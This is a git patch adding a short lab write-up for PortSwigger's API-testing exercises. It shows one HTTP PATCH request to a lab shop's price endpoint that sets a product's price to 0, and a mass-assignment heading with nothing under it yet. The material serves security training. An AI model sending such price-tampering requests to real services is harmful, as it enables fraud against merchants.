From fa6da2d20d7dfb073f7d9e65d594695ef405233d Mon Sep 17 00:00:00 2001
From: Fabio Zuber
Date: Tue, 14 May 2024 14:14:41 +0200
Subject: [PATCH] feat(bscp): start with api testing labs

---
 .../2023/portswigger-bscp-labs/api-hacking.md | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 docs/writeups/2023/portswigger-bscp-labs/api-hacking.md

diff --git a/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
new file mode 100644
index 0000000..7c8db90
--- /dev/null
+++ b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
@@ -0,0 +1,20 @@
+# API Testing
+
+## Finding and exploiting an unused API endpoint
+
+The `price` endpont not only allows the `GET` methode but also `PATCH`
+
+```
+PATCH /api/products/1/price HTTP/2
+Host: 0ad10068036333308060530f007800d6.web-security-academy.net
+Cookie: session=f1t8Tfqc7LY7RwwMuWYwYG5mA2CxkpFc
+[...]
+Content-Type: application/json;charset=UTF-8
+Content-Length: 12
+
+{"price": 0}
+```
+
+## Exploiting a mass assignment vulnerability
+